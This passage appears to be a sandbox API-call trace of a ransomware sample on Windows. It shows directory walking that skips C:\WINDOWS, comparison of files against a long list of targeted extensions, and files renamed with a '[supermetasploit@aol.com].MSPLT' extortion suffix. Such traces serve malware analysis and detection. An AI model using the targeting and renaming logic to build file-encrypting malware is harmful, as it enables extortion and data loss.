(lpString=".7z") returned 3 [0320.727] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.727] lstrlenW (lpString=".dbf") returned 4 [0320.727] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.727] lstrlenW (lpString=".1cd") returned 4 [0320.727] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.727] lstrlenW (lpString=".jpg") returned 4 [0320.727] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.728] lstrlenW (lpString=".doc") returned 4 [0320.728] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.728] lstrlenW (lpString=".docx") returned 5 [0320.728] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0320.728] lstrlenW (lpString=".pdf") returned 4 [0320.728] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.728] lstrlenW (lpString=".xls") returned 4 [0320.728] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.728] lstrlenW (lpString=".xlsx") returned 5 [0320.728] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0320.728] lstrlenW (lpString=".ppt") returned 4 [0320.728] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.728] lstrlenW (lpString=".zip") returned 4 [0320.728] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.728] lstrlenW (lpString=".rar") returned 4 [0320.728] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.728] lstrlenW (lpString=".bz2") returned 4 [0320.729] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.729] lstrlenW (lpString=".7z") returned 3 [0320.729] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.729] lstrlenW (lpString=".dbf") returned 4 [0320.729] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.729] lstrlenW (lpString=".1cd") returned 4 [0320.729] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.729] lstrlenW (lpString=".jpg") returned 4 [0320.729] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.729] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.729] lstrlenW (lpString="ROAD_01.MID") returned 11 [0320.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0321.568] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=5983) returned 1 [0321.568] CloseHandle (hObject=0x52c) returned 1 [0321.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid")) returned 0x220 [0321.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) Thread: id = 50 os_tid = 0xe28 [0283.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3fe0720 [0283.185] lstrlenW (lpString="C:") returned 2 [0283.185] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x385fcf8 | out: lpFindFileData=0x385fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x48a170 [0283.186] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0283.186] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0283.186] lstrlenW (lpString="$GetCurrent") returned 11 [0283.186] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0283.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3ff0728 [0283.187] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0283.187] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.187] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0283.187] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Logs", cAlternateFileName="")) returned 1 [0283.187] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0283.187] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent\\Logs") returned 1 [0283.187] lstrlenW (lpString="Logs") returned 4 [0283.187] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Logs") returned -1 [0283.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4001738 [0283.188] lstrlenW (lpString="C:\\$GetCurrent\\Logs") returned 19 [0283.188] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName=".", cAlternateFileName="")) returned 0x48a270 [0283.189] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e47bf6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="..", cAlternateFileName="")) returned 1 [0283.189] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b2690b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58b2690b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58b4cce4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xa7de, dwReserved0=0xffffe5f2, dwReserved1=0x516, cFileName="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DOWNLE~1.MSP")) returned 1 [0283.189] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 81 [0283.189] lstrlenW (lpString=".1cd") returned 4 [0283.189] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0283.189] lstrlenW (lpString=".3ds") returned 4 [0283.190] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".3fr") returned 4 [0283.190] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".3g2") returned 4 [0283.190] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".3gp") returned 4 [0283.190] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".7z") returned 3 [0283.190] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0283.190] lstrlenW (lpString=".accda") returned 6 [0283.190] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".accdb") returned 6 [0283.190] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".accdc") returned 6 [0283.190] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".accde") returned 6 [0283.190] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".accdt") returned 6 [0283.190] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".accdw") returned 6 [0283.190] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0283.190] lstrlenW (lpString=".adb") returned 4 [0283.190] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".adp") returned 4 [0283.190] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0283.190] lstrlenW (lpString=".ai") returned 3 [0283.190] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0283.191] lstrlenW (lpString=".ai3") returned 4 [0283.191] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ai4") returned 4 [0283.191] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ai5") returned 4 [0283.191] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ai6") returned 4 [0283.191] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ai7") returned 4 [0283.191] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ai8") returned 4 [0283.191] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".anim") returned 5 [0283.191] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0283.191] lstrlenW (lpString=".arw") returned 4 [0283.191] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".as") returned 3 [0283.191] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0283.191] lstrlenW (lpString=".asa") returned 4 [0283.191] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".asc") returned 4 [0283.191] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".ascx") returned 5 [0283.191] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0283.191] lstrlenW (lpString=".asm") returned 4 [0283.191] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0283.191] lstrlenW (lpString=".asmx") returned 5 [0283.192] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0283.192] lstrlenW (lpString=".asp") returned 4 [0283.192] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".aspx") returned 5 [0283.192] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0283.192] lstrlenW (lpString=".asr") returned 4 [0283.192] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".asx") returned 4 [0283.192] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".avi") returned 4 [0283.192] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".avs") returned 4 [0283.192] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".backup") returned 7 [0283.192] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0283.192] lstrlenW (lpString=".bak") returned 4 [0283.192] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".bay") returned 4 [0283.192] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".bd") returned 3 [0283.192] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0283.192] lstrlenW (lpString=".bin") returned 4 [0283.192] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".bmp") returned 4 [0283.192] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".bz2") returned 4 [0283.192] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0283.192] lstrlenW (lpString=".c") returned 2 [0283.193] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0283.193] lstrlenW (lpString=".cdr") returned 4 [0283.193] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cer") returned 4 [0283.193] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cf") returned 3 [0283.193] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0283.193] lstrlenW (lpString=".cfc") returned 4 [0283.193] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cfm") returned 4 [0283.193] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cfml") returned 5 [0283.193] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0283.193] lstrlenW (lpString=".cfu") returned 4 [0283.193] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".chm") returned 4 [0283.193] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cin") returned 4 [0283.193] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".class") returned 6 [0283.193] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0283.193] lstrlenW (lpString=".clx") returned 4 [0283.193] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".config") returned 7 [0283.193] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0283.193] lstrlenW (lpString=".cpp") returned 4 [0283.193] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0283.193] lstrlenW (lpString=".cr2") returned 4 [0283.194] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".crt") returned 4 [0283.194] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".crw") returned 4 [0283.194] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".cs") returned 3 [0283.194] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0283.194] lstrlenW (lpString=".css") returned 4 [0283.194] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".csv") returned 4 [0283.194] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".cub") returned 4 [0283.194] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".dae") returned 4 [0283.194] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".dat") returned 4 [0283.194] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0283.194] lstrlenW (lpString=".db") returned 3 [0283.194] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0283.195] lstrlenW (lpString=".dbf") returned 4 [0283.195] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dbx") returned 4 [0283.195] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dc3") returned 4 [0283.195] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dcm") returned 4 [0283.195] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dcr") returned 4 [0283.195] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".der") returned 4 [0283.195] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dib") returned 4 [0283.195] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dic") returned 4 [0283.195] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".dif") returned 4 [0283.195] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".divx") returned 5 [0283.195] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0283.195] lstrlenW (lpString=".djvu") returned 5 [0283.195] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0283.195] lstrlenW (lpString=".dng") returned 4 [0283.195] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".doc") returned 4 [0283.195] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0283.195] lstrlenW (lpString=".docm") returned 5 [0283.195] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0283.195] lstrlenW (lpString=".docx") returned 5 [0283.195] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0283.195] lstrlenW (lpString=".dot") returned 4 [0283.195] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dotm") returned 5 [0283.196] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0283.196] lstrlenW (lpString=".dotx") returned 5 [0283.196] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0283.196] lstrlenW (lpString=".dpx") returned 4 [0283.196] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dqy") returned 4 [0283.196] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dsn") returned 4 [0283.196] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dt") returned 3 [0283.196] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0283.196] lstrlenW (lpString=".dtd") returned 4 [0283.196] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dwg") returned 4 [0283.196] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dwt") returned 4 [0283.196] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".dx") returned 3 [0283.196] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0283.196] lstrlenW (lpString=".dxf") returned 4 [0283.196] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".edml") returned 5 [0283.196] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0283.196] lstrlenW (lpString=".efd") returned 4 [0283.196] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".elf") returned 4 [0283.196] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".emf") returned 4 [0283.196] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".emz") returned 4 [0283.196] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".epf") returned 4 [0283.196] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0283.196] lstrlenW (lpString=".eps") returned 4 [0283.197] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".epsf") returned 5 [0283.197] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0283.197] lstrlenW (lpString=".epsp") returned 5 [0283.197] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0283.197] lstrlenW (lpString=".erf") returned 4 [0283.197] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".exr") returned 4 [0283.197] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".f4v") returned 4 [0283.197] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".fido") returned 5 [0283.197] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0283.197] lstrlenW (lpString=".flm") returned 4 [0283.197] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".flv") returned 4 [0283.197] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".frm") returned 4 [0283.197] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".fxg") returned 4 [0283.197] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".geo") returned 4 [0283.197] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".gif") returned 4 [0283.197] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".grs") returned 4 [0283.197] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0283.197] lstrlenW (lpString=".gz") returned 3 [0283.197] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0283.197] lstrlenW (lpString=".h") returned 2 [0283.197] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0283.197] lstrlenW (lpString=".hdr") returned 4 [0283.197] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".hpp") returned 4 [0283.198] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".hta") returned 4 [0283.198] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".htc") returned 4 [0283.198] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".htm") returned 4 [0283.198] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".html") returned 5 [0283.198] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0283.198] lstrlenW (lpString=".icb") returned 4 [0283.198] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".ics") returned 4 [0283.198] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".iff") returned 4 [0283.198] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".inc") returned 4 [0283.198] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".indd") returned 5 [0283.198] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0283.198] lstrlenW (lpString=".ini") returned 4 [0283.198] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".iqy") returned 4 [0283.198] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".j2c") returned 4 [0283.198] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".j2k") returned 4 [0283.198] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".java") returned 5 [0283.198] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0283.198] lstrlenW (lpString=".jp2") returned 4 [0283.198] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0283.198] lstrlenW (lpString=".jpc") returned 4 [0283.199] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".jpe") returned 4 [0283.199] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".jpeg") returned 5 [0283.199] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0283.199] lstrlenW (lpString=".jpf") returned 4 [0283.199] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".jpg") returned 4 [0283.199] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".jpx") returned 4 [0283.199] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".js") returned 3 [0283.199] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0283.199] lstrlenW (lpString=".jsf") returned 4 [0283.199] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".json") returned 5 [0283.199] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0283.199] lstrlenW (lpString=".jsp") returned 4 [0283.199] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".kdc") returned 4 [0283.199] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".kmz") returned 4 [0283.199] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".kwm") returned 4 [0283.199] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0283.199] lstrlenW (lpString=".lasso") returned 6 [0283.199] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0283.199] lstrlenW (lpString=".lbi") returned 4 